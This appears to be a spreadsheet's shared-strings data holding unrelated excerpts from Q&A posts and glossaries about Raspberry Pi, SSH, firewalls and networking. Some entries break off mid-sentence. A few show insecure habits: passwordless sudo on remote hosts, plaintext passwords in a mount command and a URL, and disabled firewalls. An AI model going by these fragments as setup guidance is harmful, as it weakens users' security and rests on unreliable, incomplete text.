    <t>One constructor on LiteDb uses a stream (System.IO.Stream), is there anyway to convert the StorageFile object into a stream (derived from System.IO.Stream) in order to fulfill the new win10 security restrictions (requiring user permissions to access areas etc., preventing traditional File.Write/path based access to anything other than your application data directory).</t>
  </si>
  <si>
    <t>If you using http port 80 execute first:
netsh advfirewall firewall add rule name="Open 80" dir=in action=allow protocol=TCP localport=80
netsh advfirewall firewall add rule name="Open 80" dir=out action=allow protocol=TCP localport=80
If you want the webserver not be be quit after you close your PowerShell use the following PowerShell command to fork the process.</t>
  </si>
  <si>
    <t>You can perform a variety of tasks using the Netsh command-line utility, including configuring the IP addresses of network adapters in Windows.</t>
  </si>
  <si>
    <t>An alternative would be to expose the database server directly via internet and make the database query directly from the client (raspi).</t>
  </si>
  <si>
    <t>go here and get the pro version for free (since you are a student)
https://www.jetbrains.com/student/
then find the ip address of your pi if you dont already know it
then set up your project to automatically sync
Tools &gt; Deployment &gt; Configuration   
click + to add a new configuration
enter your pi's IP address and user credentials
then click the mapping tab and set up one or more folder mappings
then go to File &gt; Settings
then go to Project : My Project Name &gt; interpretter and click the gear and click add remote and select your deployment server ... now you can run and debug in pycharm remotely</t>
  </si>
  <si>
    <t>Try this:
After installation, run MySql Secure Installation:
You'll be asked a series of security related configuration questions, including setting the root password.</t>
  </si>
  <si>
    <t>The best bets for you would be to implement this functionality using:
Wi-Fi Direct - both devices support Wi-Fi and both can implement Wi-Fi direct peer to peer connection.</t>
  </si>
  <si>
    <t>As it generates a cornucopia of data, I think it can be useful
What I can tell from this, is that it should be properly set up to hang up for a blacklisted number (my cellphone, for testing purposes) and that no caller id gets to the software.</t>
  </si>
  <si>
    <t>I've run realm list and verified the login-policy is set to allow-permitted-logins and the desired group is part of permitted-groups.</t>
  </si>
  <si>
    <t>The Remote Access Connection Manager may be used for purposes such as allowing an employee with a Windows computer at a home office to gain access to network servers and data stores.</t>
  </si>
  <si>
    <t>I have a Raspberry Pi and did the following steps:
Update the operating system:
sudo apt-get update &amp;&amp; sudo apt-get upgrade
Install mySQL server:
sudo apt-get install mysql-server
Install mySQL client:
sudo apt-get install mysql-client
Check status of mySQL:
sudo service mysql status
Install mySQL python connector:
sudo apt-get -y install python3-mysql.connector
Give mySQL a password:
sudo mysql -uroot
use mysql;
update user set authentication_string=PASSWORD('mynewpassword') where User='root'; 
Note: In the above command keep the root user, just set the password.</t>
  </si>
  <si>
    <t>first configuration (/etc/dhcpcd.conf):
after reboot 'ifconfig' shows the correct IP settings:
result:
Internet on the Raspberry Pi (eth1): doesn't work
access to Raspberry Pi over Internet (via eth0):
SSH (TCP): works fine
Apache web server (TCP): works fine
NTP time server (UDP): works fine
Now I tried to change the metric of the interfaces, hoping that the change of prioritization is successful
second configuration (/etc/dhcpcd.conf):
interface eth1
metric 200
interface eth0
static ip_address=141.41.241.68/28
static routers=141.41.241.65 192.168.0.1
metric 201
result:
Internet on the Raspberry Pi (eth1): works fine
access to Raspberry Pi over Internet (via eth0):
SSH (TCP): doesn't work
Apache web server (TCP): doesn't work
NTP time server (UDP): doesn't work
Ok.</t>
  </si>
  <si>
    <t>I think that I need a program, probably running on the aforementioned server, to make the configuration of the RPis as fool proof as possible so that the remote staff may do the configuration that cannot be automated.</t>
  </si>
  <si>
    <t>If the user is not , configure remote /etc/sudoers for passwordless command execution via sudo command.</t>
  </si>
  <si>
    <t>This change has been made because it ensures that Watson IoT Platform is secure out of the box: it is then a conscious decision by your administrator to lessen the security should you wish to connect to port 1883.</t>
  </si>
  <si>
    <t>Authenticators are responsible for ensuring that no operation
  is performed without the users consent.</t>
  </si>
  <si>
    <t>I have created ssh file and wpa_supplicant.conf on boot  partition
OS on pi : strech
my machine running on windows 10
I didnt find ip of pi3 on my routers client list also</t>
  </si>
  <si>
    <t>You can install it with
Next, you should try to connect to your SSH server locally, that means, open up a terminal directly on your RP and try to connect to your locally running SSH server:
Or even better, use the current IP address of the RP instead of localhost.</t>
  </si>
  <si>
    <t>All you need to do is update the firmware of your raspberry Pi while the sd card is still plugged in your RPi 1,
Step 1, Update the System, 
Step 2, Upgrade the System sudo apt-get upgrade
Step 3, Update the firmware itself, sudo apt-get install rpi-update
Reboot and shutdown your RPi 1.</t>
  </si>
  <si>
    <t>Here, protocols like Ethernet, 802.11a/b/g/n, and Token Ring specify how to handle multiple concurrent accesses to the physical medium and how to direct traffic to one device instead of another.</t>
  </si>
  <si>
    <t>Modems are built to do that, but the bandwidth available to do so is not large, so you might have difficulty if your encryption requires more bandwidth per second of time than can be received on the other end.</t>
  </si>
  <si>
    <t xml:space="preserve">
SOURCE:
Bad behaviour when transmission-remote authentication fails
https://github.com/transmission/transmission/issues/174</t>
  </si>
  <si>
    <t>You should check for below items
there is an installed internet information services
iis is running
firewall is grants required ports for running the</t>
  </si>
  <si>
    <t>Remote debugging is the process of running a debug session in a local development environment attached to a remotely deployed application.</t>
  </si>
  <si>
    <t>Http:BL is a system that allows website administrators to take advantage of the data generated by Project Honey Pot in order to keep suspicious and malicious web robots off their sites.</t>
  </si>
  <si>
    <t>Secure Copy or SCP is a means of securely transferring computer files between a local and a remote host or between two remote hosts over an SSH protocol.</t>
  </si>
  <si>
    <t>When the virtual machine is terminated due to user logoff or system shutdown the underlying operating system may only allow a fixed amount of time in which to shut down and exit.</t>
  </si>
  <si>
    <t>httpbl is a system that allows website administrators to take advantage of the data generated by Project Honey Pot in order to keep suspicious and malicious web robots off their sites.</t>
  </si>
  <si>
    <t>The netgroup file defines "netgroups", which are sets of (host, user, domain) tuples, used for permission checking when doing remote mounts, remote logins and remote shells.</t>
  </si>
  <si>
    <t>Safe
WebAssembly describes a memory-safe, sandboxed execution environment that may even be implemented inside existing JavaScript virtual machines.</t>
  </si>
  <si>
    <t>For more information, see Unsafe Code and Pointers (C# Programming Guide)
The unsafe Keyword on MSDN 
http://msdn.microsoft.com/en-us/library/chfa2zb8(v=vs.100).aspx
In Java, sun.misc.Unsafe is a special class performing low-level, unsafe operations.</t>
  </si>
  <si>
    <t>So the Python script is called power.py, and can be controlled with URL variables, so if I go to power.py?device=1&amp;power=on&amp;time=10&amp;password=hunter2 that turns on device 1 for 10 seconds.</t>
  </si>
  <si>
    <t>On the Pi, I've installed Node-RED that exposes an HTTP POST endpoint (/command).</t>
  </si>
  <si>
    <t>You just need to make sure that pigpiod is configured to listen on the external interface and that the firewall will not block access.</t>
  </si>
  <si>
    <t>For two reasons, one is it's easy to set route static content around the node process, and also because I prefer not to setup my own access privileges from scratch.</t>
  </si>
  <si>
    <t>PingAccess sits at the perimeter of a protected network, applying authorization decisions on inbound API calls and Web applications before relaying them to their back-end target endpoints.</t>
  </si>
  <si>
    <t>Rooting is often performed with the goal of overcoming limitations that carriers and hardware manufacturers put on some devices, resulting in the ability to alter or replace system applications and settings, run specialized apps that require administrator-level permissions, or perform other operations that are otherwise inaccessible to a normal Android user.</t>
  </si>
  <si>
    <t>This term is often used to describe WCF web services that do not require IIS as their web host - a self-hosted WCF service establishes its own HTTP endpoints and listeners and is responsible for its own routing, security, and configuration management.</t>
  </si>
  <si>
    <t>*note: numbers have been changed for security reasons
Here is what I have:
Client
Raspberry Pi 3 with IP: 192.168.0.133
manual port in raspberry pi 3 sshd_config file: 1502
Router:
NAT Virtual Server:
External port: 1502
Internal port: 22
IP address: 192.168.0.133
DNS(duckdns.org)
- checked to make sure public IP address points to the domain: testing2@duckdns.org
ssh command that works on client:
ssh -p 1502 client@192.168.0.133
ssh command that doesn't work
ssh -p 1502 client@testing2.duckdns.org
So I'm not sure where it's going on.</t>
  </si>
  <si>
    <t>Capacity can be easily added  Jenkins can automatically set up a new build slave on any SSH-accessible machine; it can even launch new machines to run jobs on, e.g.</t>
  </si>
  <si>
    <t>UPDATE
I noticed that gst-play works fine when i am logged in as root but it hangs when i am logged in as user pi.</t>
  </si>
  <si>
    <t>I have successfully managed to configure a USB 3G modem to allow my pi to connect too the internet however I have no way of testing if eth0 is up again to trigger the disconnect of the 3G modem.</t>
  </si>
  <si>
    <t>But in order to get the other PIDs, firstly you should know that those data are heavily under control by the car manufacturers and you have to hack them.</t>
  </si>
  <si>
    <t>I can confirm:
in /etc/ssh/sshd_config
X11Forwarding yes
X11DisplayOffset 10...
xauth is installed on the remote Pi.</t>
  </si>
  <si>
    <t>-------------- UPDATE ----------------
Apperently the file twython-3.4.0.egg-info has nothing to do and is not used with certbot... as far as it seems it got installed with an update from my system orso.</t>
  </si>
  <si>
    <t>OpenVPN is an open source software application that implements virtual private network (VPN) techniques for creating secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities.</t>
  </si>
  <si>
    <t>It is installed on a computer to make a dedicated firewall/router for a network and is noted for its reliability and offering features often only found in expensive commercial firewalls.</t>
  </si>
  <si>
    <t>If you want to play with the stream directly on the mac, you can poke around the ssh man page and find out the cryptic flag combination which will allow you to also stream the data directly through the ssh connection to the mac also.</t>
  </si>
  <si>
    <t>Note: You can setup port forwarding on your home router to forward all https requests to your Pi.</t>
  </si>
  <si>
    <t>The above exception can be due to variety of reasons such as loss of network connectivity, policy restrictions to connect or subscribe etc.</t>
  </si>
  <si>
    <t>I have a proxy set up with whitelist that works fine.</t>
  </si>
  <si>
    <t>But can not get through the internet modem because of the firewall in the router.</t>
  </si>
  <si>
    <t>Everything seems fine until I try opening the UsbDeviceConnection, which always fails despite permissions are granted.</t>
  </si>
  <si>
    <t>My guess is that the router definitely needs a firewall configuration.</t>
  </si>
  <si>
    <t>You need to configure your router's firewall to forward the ports needed for SSH to your RP.</t>
  </si>
  <si>
    <t>It says that the firewall is the usual iptables firewall used on linux systems.</t>
  </si>
  <si>
    <t>The bluetooth.conf dbus file should have been installed that sets up correct bluetooth dbus permissions.</t>
  </si>
  <si>
    <t>An alternative is to change SSHD configuration files on you Pi to allow some algorithms JSCH from your JDK/JRE supports.</t>
  </si>
  <si>
    <t>Mapping between physical pin and pin exposed through fex file to operating system is arbitrary.</t>
  </si>
  <si>
    <t>I do not have an answer for you for the VS remote debugging, and doubt you'll be able to do it.</t>
  </si>
  <si>
    <t>You will need to set up SSL certificates along with a username/password combination to secure the traffic.</t>
  </si>
  <si>
    <t>Is there any extra network equipment in between, like router/firewall?</t>
  </si>
  <si>
    <t>My second Tip: You may check firewalls, access permission and  if everything is fine.</t>
  </si>
  <si>
    <t>It turns out I need to configure the Windows Firewall.</t>
  </si>
  <si>
    <t>It must have the firewall configuration set correctly.</t>
  </si>
  <si>
    <t>A bundle of interceptors invoked on an action in the order specified in the configuration.</t>
  </si>
  <si>
    <t>An affinity group is required in order to create a virtual network.</t>
  </si>
  <si>
    <t>404.5  Denied by request filtering configuration.</t>
  </si>
  <si>
    <t>We are trying to make IoT edge work with specific proxy configuration works over communication having speed of 800kb/s
Our proxy configuration only allows HTTP communication only for whitelisted URL or by specific Proxy configuration URL.</t>
  </si>
  <si>
    <t>I'm not sure if it's significant but the Pi is being controlled via PuTTY ssh with X11 forwarding on a Debian laptop.</t>
  </si>
  <si>
    <t>Data Security means protecting a database from destructive forces and the unwanted actions of unauthorized user.</t>
  </si>
  <si>
    <t>deadlock/livelock avoidance)
Publication: ensure data altered in one thread is only visible to others as expected
Synchronization: ensure critical regions are protected from multiple concurrent updates causing data loss/corruption.</t>
  </si>
  <si>
    <t>Thats it, from next time onwards whenever there is OS/security update.Updates will be downloaded and install automatically.Also you can update your applications from console.See below image and for more info refer.</t>
  </si>
  <si>
    <t>Basically the first copy gets the tags registered with it and the second copy unregisters them (or more accurately, replaces window.riot with a copy that has no knowledge of your tags).</t>
  </si>
  <si>
    <t>Secure Copy or SCP is a means of securely transferring computer files between a local and a remote host or between two remote hosts.</t>
  </si>
  <si>
    <t>By using logic, the player can in many instances use this information to deduce that certain other squares are mine-free, in which case they may be safely revealed, or mine-filled, in which they can be marked as such (which, in typical implementations, is effected by right-clicking the square and indicated by a flag graphic).</t>
  </si>
  <si>
    <t>Device Portal APIs are intended for remote management, and may not work from within a UWP against localhost due to loopback restrictions in Windows (to prevent an app from attacking the device it's running on).</t>
  </si>
  <si>
    <t>after you enter the credentials, the text to speech node shows extra configuration input such as voice and audio format that you must configure.</t>
  </si>
  <si>
    <t>However, the key difference to the instructions for installing nodemcu-tool was adding the '--unsafe-perm' parameter to it, like so:
That was to be able to get past the repeated installation errors for the serialport package...
IMO, relying on unsafe permissions (for what exactly, anyway!?)</t>
  </si>
  <si>
    <t>Because of how the Remote SSH function actually work, when you connect to your SSH host, the Remote SSH extension provisions the so-called VS Code Server to that host, so the VS Code Server has to be able to run in your remote environment.</t>
  </si>
  <si>
    <t>Furthermore, it seems completely unresponsive to the standard bluetooth connection methodology and requires a host of workaround/hackish method calls that are all highly unsafe and unstable.</t>
  </si>
  <si>
    <t>GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment</t>
  </si>
  <si>
    <t>A firewall is activated when the URL of an incoming request matches the configured firewall's regular expression pattern config value.</t>
  </si>
  <si>
    <t>Normal IoTivity discovery uses udp multicast, make sure your wifi router isn't blocking/filtering such.</t>
  </si>
  <si>
    <t>Debug Profile:
Things I have checked:
Windows Firewall off
Reinstalled the WinIot Image to start fresh
Started a fresh UWP project with no code in it
Set build verbosity high, but did not have issues on the build, only the deploy
Added the WinIoT image to my trusted hosts with the windows powershell commands
Was able to remote in with PowerShell, no issue there.</t>
  </si>
  <si>
    <t>ngrok is a tunneling, reverse proxy that establishes secure tunnels from a public endpoint to a locally running network service while capturing all traffic for inspection and replay.</t>
  </si>
  <si>
    <t>What I want to do firstly using my raspberry pi 2 running raspbian, and secondly a laptop running kali, is to be able to do penetration testing along with some extras.</t>
  </si>
  <si>
    <t>All pages are referring to using the Raspberry Pi to create a wifi network/access point:
Setting up Raspberry Pi wifi access point
Running wireless router with Kali Linux + Raspberry Pi
Start to finish walkthrough of setting up Raspberry Pi as a wireless access point
Below is some information on setting up a DHCP server specifically, in case that's the issue with setting up your Raspberry Pi as a wireless AP.</t>
  </si>
  <si>
    <t>I know this is old but I did the same silly thing
Make note of the "sudo"
edit your file settings.json file
Also you have to use the --auth on every command so in your case you would put
transmission-remote --auth myusername:mypassword -DU -c required -p 9091 -w ~/torrents</t>
  </si>
  <si>
    <t>Combining your data with Google's event data can provide better attribution, improve advertising efficiency, and give a holistic view of different advertising channels.</t>
  </si>
  <si>
    <t>I am trying to SSH into my raspberry pi from my windows machine, and the terminal environment WAS working fine, but the GUI is acting really crappy.</t>
  </si>
  <si>
    <t>The source code and running environment of Windows PC were trustful.</t>
  </si>
  <si>
    <t>What code I have know works, but this really brute force solution I would like to avoid.</t>
  </si>
  <si>
    <t>You'll need to configure your router with port forwarding, to access your db from outside.</t>
  </si>
  <si>
    <t>For example, it can copy a file to a folder, but it cannot copy a file to a certificate drive.</t>
  </si>
  <si>
    <t>In this mode, only a small part of the block chain is
downloaded and verified, making bitcoinj suitable for usage on
constrained devices like laptops, smartphones or cheap virtual
private servers.</t>
  </si>
  <si>
    <t>I flushed all the rules for iptables and turned off my windows firewall.</t>
  </si>
  <si>
    <t>I've tried: 
- Put APK on system/priv-app folder
- Run adb set-device-owner
- Install apk using adb install
And nothing...</t>
  </si>
  <si>
    <t>I am using it to ssh into a Raspberry Pi, take an image, then scp it back to my windows machine.</t>
  </si>
  <si>
    <t>It also works fine, but when i tried to run programmatically, it displays as "ACCESS DENIED ERROR 0x80070005"
I tried running through powershell using process launcher i get the same error.</t>
  </si>
  <si>
    <t>I am trying to have every script in Pi A and I am running them remotely on the other machines with ssh.</t>
  </si>
  <si>
    <t>If I access the new router from Windows 10 using Firefox, everything is fine after adding the exception for the certificate.</t>
  </si>
  <si>
    <t>To see how the network configuration is done, read up on LHN (Linux Home Networking) site, which has a set of HOWTOs to do the network configuration.</t>
  </si>
  <si>
    <t>If it needs to go over internet, you should probably also configure you router to let the traffic pass.</t>
  </si>
  <si>
    <t>Verify you have the Remote Machine "Authentication Mode" set to .</t>
  </si>
  <si>
    <t>Way N2: 
And here is another way that needs this lib v4l2capture and You should use it like this:
Installation
For this lib you need to install libv4l like sudo apt-get install libv4l.</t>
  </si>
  <si>
    <t>By default , it discovers peers by App Id and will get connected with other peers who runs same app.</t>
  </si>
  <si>
    <t>Check if your pi or router firewall is dropping your traffic.</t>
  </si>
  <si>
    <t>Those environment variables ( and SSH_TTY) are only set in the environment of an SSH session.</t>
  </si>
  <si>
    <t>Additionally, the local and remote machines should be set up to SSH without an interactive login.</t>
  </si>
  <si>
    <t>Basically, iptables is a default firewall on Linux.</t>
  </si>
  <si>
    <t>Safe Exam Browser is a webbrowser-environment to carry out online exams safely.</t>
  </si>
  <si>
    <t>Blacklist is a less secure but also less restricted approach than whitelist.</t>
  </si>
  <si>
    <t>Remote access server - provides remote access connectivity to dial-up or VPN remote access clients that use IP, IPX, AppleTalk, or NetBEUI.</t>
  </si>
  <si>
    <t>Some of these restrictions can be relaxed by configuring the application to require elevated trust.</t>
  </si>
  <si>
    <t>The Chromium Embedded Framework (CEF) provides support for JavaScript, HTML5, CSS, SVG and WebGL while Node.js brings http/https servers and client APIs, filesystem, cryptography, sandboxed code execution environments and tools for exposing native C++ bindings to JavaScript.</t>
  </si>
  <si>
    <t>Having a cronjob that is restricted which then calls a bash script which is restricted to then run a process that is restricted gives you more security.</t>
  </si>
  <si>
    <t>This is probably a long shot, I am trying to install a Avreo (PACs) client on our windows machines and i am get a prompt that I cant determine the source of, it doesn't look native to windows prompt and all firewalls and defenders anti-virus are disabled.</t>
  </si>
  <si>
    <t>TrustManagers are a Java tool for Android responsible for managing the trust material that is used when making trust decisions, and for deciding whether credentials presented by a peer should be accepted.</t>
  </si>
  <si>
    <t>Worker nodes proceed on registering themselves with the balancer by sending custom HTTP methods messages, telling the balancer where to contact them, i.e.</t>
  </si>
  <si>
    <t>Other things (probably not relevant but including for completeness)
pi access is via SSH (it's headless)
on booting the pi, sudo systemctl status blueto* shows an error message on the bluetooth service: Failed to set privacy: Rejected (0x0b), apparently a boot-related issue (link) which is fixed by manually restarting the bluetooth service after boot using systemctl (ugly, but fine as a workaround for now)
no suspicious looking messages in dmesg, user.log or boot.log
but the following was in daemon.log, it correlates with an execution of the aplay command above (but I have tried that command several times with the same console output, it generates them sometimes only):
.</t>
  </si>
  <si>
    <t>The command does not need sudo to run and I have already changed to sudoers file to not require a password for admin's (I'm running an arp scan earlier in the program using Runtime())
I am able to copy and paste the rule into terminal that "command" outputs and it runs fine.</t>
  </si>
  <si>
    <t>I've successfully set up a SSH client on my laptop (PuTTY) and enabled SSH using raspi-config.</t>
  </si>
  <si>
    <t>I have installed and fully configured a MQTT broker on the raspberry pi following this tutorial: https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-the-mosquitto-mqtt-messaging-broker-on-ubuntu-16-04
Everything works fine and well on the broker's side.</t>
  </si>
  <si>
    <t>I'm looking for OS that can easly installed and have SSH keys interface like Ubunto SSO, I have tried already Ubunto Core and its almost imposibble to install Node.js with Snap, I have also tried Raspbian and it was trouble to set all setting manualy.</t>
  </si>
  <si>
    <t>I couldn't find how to add a rule to the Firewall but after some help on Freenode C# Chat forum, I found the following snippet:
First I log into the Pi through PowerShell
Then I manually add the Firewall opening of the port I'm using.</t>
  </si>
  <si>
    <t>In fact, any board that has USB OTG and is supported by Android Things would allow debugging over USB, just as a "regular" smartphone/tablet.</t>
  </si>
  <si>
    <t>You need to add the port to firewall with following cmdlet in powershell,by default ASP.Net Core binds to http://localhost:5000.
netsh advfirewall firewall add rule name="ASPNet Core 2 Server Port" dir=in action=allow protocol=TCP localport=62100</t>
  </si>
  <si>
    <t>Known as the "Swiss Army Knife" of WAFs, it enables web application defenders to gain visibility into HTTP(S) traffic and provides a power rules language and API to implement advanced protections.</t>
  </si>
  <si>
    <t>As Java GUI environments are not thread-safe, it is the only thread that can safely touch GUI components (instantiating and updating GUI components, including setting values for text fields and the like).</t>
  </si>
  <si>
    <t>Version 1.1 of twitter's API
New in v1.1:
Required authentication on every API endpoint
A new per-endpoint rate-limiting methodology
Changes to our Developer Rules of the Road, especially around applications that are traditional Twitter clients.</t>
  </si>
  <si>
    <t>Users must purchase premium packages in order to connect their sites to their own domains, remove Wix ads, add e-commerce capabilities, buy extra data storage and bandwidth and more.</t>
  </si>
  <si>
    <t>When fetching all contacts and caching the results, first fetch all contacts identifiers, then fetch batches of detailed contacts by identifiers as required.</t>
  </si>
  <si>
    <t>See also:
https://www.chromium.org/Home/chromium-security/corb-for-developers
https://chromium.googlesource.com/chromium/src/+/master/services/network/cross_origin_read_blocking_explainer.md</t>
  </si>
  <si>
    <t>Administrators can use tools designed to manipulate isolated storage to configure file storage space, set security policies, and delete unused data.</t>
  </si>
  <si>
    <t>A security group acts as a virtual firewall that controls the traffic for one or more instances.</t>
  </si>
  <si>
    <t>It supports many operations, such as:
Creating filters, labels, aliases, delegates;
Updating various settings for a user's account;
Retrieving existing settings for a user's account.</t>
  </si>
  <si>
    <t>If anything goes wrong getting the policy from AWS, then you are left with an incorrectly configured entry in the keystore and the code as supplied by AWS can never recover from that.</t>
  </si>
  <si>
    <t>Also, make sure no firewalls are blocking the incoming UDP trafict towards the client (Windows firewall, in particular).</t>
  </si>
  <si>
    <t>Inbound Security Rules controls the inbound network traffic to the Network Security Group in Microsoft Azure Cloud Platform</t>
  </si>
  <si>
    <t>Most IRC Networks now feature IRC Services, that enable someone to configure and protect channels in greater detail.</t>
  </si>
  <si>
    <t>It was that I was trying to start the node server from my terminal window within my IDE that is connected to my pi via my mac, instead of using ssh to log into my pi then from that terminal window starting my node server.</t>
  </si>
  <si>
    <t>The BFG Repo-Cleaner is an alternative to Git's native  that's made for cleansing unwanted data (big files, passwords) out of Git repository history.</t>
  </si>
  <si>
    <t>The reason this works when you stop the mosquitto service and restarting it manually is that the service is set to point to the installed config file  where as when you start it manually you are not specifying the config file (mosquitto does not default to loading any config files) so you are removing the options that require username/password.</t>
  </si>
  <si>
    <t>So you have two approaches, give the motion user sudo privilege to play the audio file (bad, see below) OR find a way to play the file without sudo - I'd look for a Python library or user accessible utility if aplay requires root.</t>
  </si>
  <si>
    <t>Another way of saying that could be: It's an API that helps you make sure that clients don't supply malicious cargo code in the HTML they supply for their profile, comments, etc., that get persisted on the server.</t>
  </si>
  <si>
    <t>Update auth (setup an account) and core.conf (set allow_remote flag) files in home dir of deluge user (as opposed to home dir of pi user that is usually mentioned in other tutorials).</t>
  </si>
  <si>
    <t>Wi-Fi Direct
Developers can use a framework API to discover and connect directly to nearby devices over a high-performance, secure Wi-Fi Direct connection.</t>
  </si>
  <si>
    <t>The reason for distributing the intelligence amongst the base-stations in LTE is to speed up the connection set-up and reduce the time required for a handover.</t>
  </si>
  <si>
    <t>To access a database on another machine, you need to use a network file system (see Samba), and ensure that it is correctly configured.</t>
  </si>
  <si>
    <t>You have to create a CredentialProvider in order to perform a logon operation to a windows 10 device.</t>
  </si>
  <si>
    <t>Remove all you installed certificates and install the myEdgeDevice.pfx file directly by double clcking it.</t>
  </si>
  <si>
    <t>It looks to me that even though the service is up and running in your [deviceA] , there is some kind of firewall not allowing external connections to it from outside .</t>
  </si>
  <si>
    <t>i've heard of people fooling to work with other audio devices, but that's the extent of bluetooth connectivity.</t>
  </si>
  <si>
    <t>USB wireless modems were among the first devices able to access these networks, with WiMAX smartphones becoming available during 2010, and LTE smartphones arriving in 2011.</t>
  </si>
  <si>
    <t>One must avoid having both PyCrypto and PyCryptodome installed at the same time, as they will interfere with each other.</t>
  </si>
  <si>
    <t>For convenience, I am using ssh, so I can perform tests on the raspberry directly from my laptop.</t>
  </si>
  <si>
    <t>I tried to connect with disabled firewall on my laptop, with another port (8888/9999) and with my smartphone, everytime the same error.</t>
  </si>
  <si>
    <t>I think I'm doing something wrong because I can't just copy/paste this script:
So that I can run the following:
Anyone know how I can get PIJS to access the endpoints?</t>
  </si>
  <si>
    <t>Raspberry pi easily suffer the sudden cutoff of power supply, which may lead to a system corruption or data losing.</t>
  </si>
  <si>
    <t>I installed the mitmproxy certificate on the phone and the traffic shows up fine on the mitmproxy console.</t>
  </si>
  <si>
    <t>I am trying to remotely gain access to the command line of a Raspberry Pi 3 from my windows laptop on the same network using ssh.</t>
  </si>
  <si>
    <t>I want to keep two wifi routers in a room in such a way that a WiFi station does not see both the Access Points at the same time.</t>
  </si>
  <si>
    <t>So the problem does not seem to come with some network configuration on external devices, but more on the Personal Hotspot feature.</t>
  </si>
  <si>
    <t>I would like to be able to remotely start or restart the monitoring script remotely.</t>
  </si>
  <si>
    <t>My problem, in a nutshell, is the following: 
I use Privoxy to set up a whitelist of sites in Raspbian Jessie on Chromium.</t>
  </si>
  <si>
    <t>I'm using no-ip to get a static IP, I have set the router DMZ on the Pi and it's connected through WiFi, so there should be no firewall between the Pi and my phone.</t>
  </si>
  <si>
    <t>The equivalent cifs mount command works for my machine 192.168.1.1:
 mount -t cifs //192.168.1.1/Media -o ro,domain=Servalan,username=Aios,password=Aios /tmp/nfs/Media
The .1.1 machine (Asus) is a mounted HD on my Asus router.</t>
  </si>
  <si>
    <t>I push to the bare and set the hook there)
with the same configuration, authorizations, this wouldn't work on my linux (raspberry) but would work perfectly on my windows computer.</t>
  </si>
  <si>
    <t>The router is set without any security(no WPA)
The sniffing work fine on the 2.4 Ghz-band, when i sniff the packets using airodump-ng and wireshark.</t>
  </si>
  <si>
    <t>But in this case, you want to remove it locally and keep it on the remote repo, and want git to untrack that remote directory.</t>
  </si>
  <si>
    <t>I think you can even update the code to use 00000000-00000000 as the destination address, and the router will always send to the coordinator.</t>
  </si>
  <si>
    <t>AP Channels at 802.11b/g/n is for creating multitude of communicating devices on same medium and avoiding interference.</t>
  </si>
  <si>
    <t>Environment variables
Another way is to use environment variables
import os
conn = MySQLdb.connect(host="192.168.1.123", user=os.environ['MYSQL_USER'], passwd=os.environ['MYSQL_PASSWORD'], db="mydb")
But you will have to set these variables somewhere.</t>
  </si>
  <si>
    <t>Ensure that the policy you have attached to your certificate that is attached to your device grants access to your desired topic names.</t>
  </si>
  <si>
    <t>Check if there is some rule configured in the router or there is some filter to block the ip and port in your PC.</t>
  </si>
  <si>
    <t>venv/bin/activate 
(venv)$ pip install ipykernel 
(venv)$ ipython kernel install --user --name=remote-kernel 
(venv)$ deactivate
Now this env will be available under the name remote-kernel in jupyterlab/notebook kernel menu.</t>
  </si>
  <si>
    <t>You would install Edge on a machine locally and that server needs to be able to access Azure - at least during deployment.</t>
  </si>
  <si>
    <t>An external interrupt - once 'un-masked' - has the ability to wake the device up even if the global  flag is unset using cli().</t>
  </si>
  <si>
    <t>I have noticed problems with files remaining locked on ms-windows network filesystems as well.</t>
  </si>
  <si>
    <t>Azure IoT Device Management allows you to update software remotely without the need to have local, physical access to the device.</t>
  </si>
  <si>
    <t>Bitmask is a technique used to isolate specific bits in a byte in order to work only on the desired ones.</t>
  </si>
  <si>
    <t>The ebtables program is a filtering tool for a Linux-based bridging firewall.</t>
  </si>
  <si>
    <t>Android App restrictions allow the enterprise administrator to remotely specify settings for apps.</t>
  </si>
  <si>
    <t>Accessing the advertising identifier requires apps to read and honor the opt-out flag.</t>
  </si>
  <si>
    <t>Filters: ASP.NET Web API supports filters including well-known filters such as the [Authorize] attribute.</t>
  </si>
  <si>
    <t>For API v2:
http://gmaps-utility-library.googlecode.com/svn/trunk/keydragzoom/
http://gmaps-utility-library-dev.googlecode.com/svn/trunk/keydragzoom/
For API v3:
http://google-maps-utility-library-v3.googlecode.com/svn/tags/keydragzoom/</t>
  </si>
  <si>
    <t>The increasingly-popular platform runs each application in an isolated environment with limited privileges.</t>
  </si>
  <si>
    <t>This is done by being able to set parameter for searches, allowing the filtering of unwanted information.</t>
  </si>
  <si>
    <t>SSSD provides a set of daemons to manage access to remote directories and authentication mechanisms.</t>
  </si>
  <si>
    <t>The code is written in a sandboxed, virtual machine language called ZPAQL.</t>
  </si>
  <si>
    <t>You install it with::
pip install pycryptodomex   
In this case, all modules are installed under the Cryptodome package.</t>
  </si>
  <si>
    <t>The operating system takes care of isolating processes one from another in order to provide data integrity and also provides means for interprocess communication (IPC).</t>
  </si>
  <si>
    <t>(ofcourse this can be done easily by using arduino+ethernet as server but the problem with this is you need port forward the router in order to access server from outside the local network Port forwarding is little risk as per security aspects.)</t>
  </si>
  <si>
    <t>Here's what worked
Go to official mysql installation guide and follow line by line
You need to download a .deb file from here that configures which version of mysql you want to install and other configurations
After configurations are all done run sudo apt-get update &amp;&amp; sudo apt-get install mysql-server This time you'd be asked for a password.</t>
  </si>
  <si>
    <t>Note that even when exposing an input device like this, discovery
(e.g., libinput list-devices) won't work without additional
configuration.</t>
  </si>
  <si>
    <t>In order to inspect HTTPS, you need install for example SQUID and enable SSL Inspection.</t>
  </si>
  <si>
    <t>Alternatively, OpenVPN could be used to give you access to the entire network by just opening port 1154 and setting up the configurations.</t>
  </si>
  <si>
    <t>If the virtual machine aborts then no guarantee can be made about whether or not any shutdown hooks will be run.</t>
  </si>
  <si>
    <t>My android phone IP 192.168.43.1
My static Raspberry IP 192.168.43.5
I try to change the port number but the connection still jammed, I try to reduce the size of the packet data but also still jammed .I assume the raspberry firewall (if it exist) is the problem Or maybe the iptables configuration, but how to check and disable the Raspberry firewall?</t>
  </si>
  <si>
    <t>I've created an INF file for a device which uses usbser.sys driver file, however even though I've signed it, I'm having trouble installing it on the target machine,   in particular, I'm getting the following error...
Windows cannot verify the digital signature for the drivers required for this device.</t>
  </si>
  <si>
    <t>SQLite is quite suitable for sharing information between processes, although I suspect its locking is quite coarse-grained so if the processes make frequent updates (many a second) then you might find that this affects performance.</t>
  </si>
  <si>
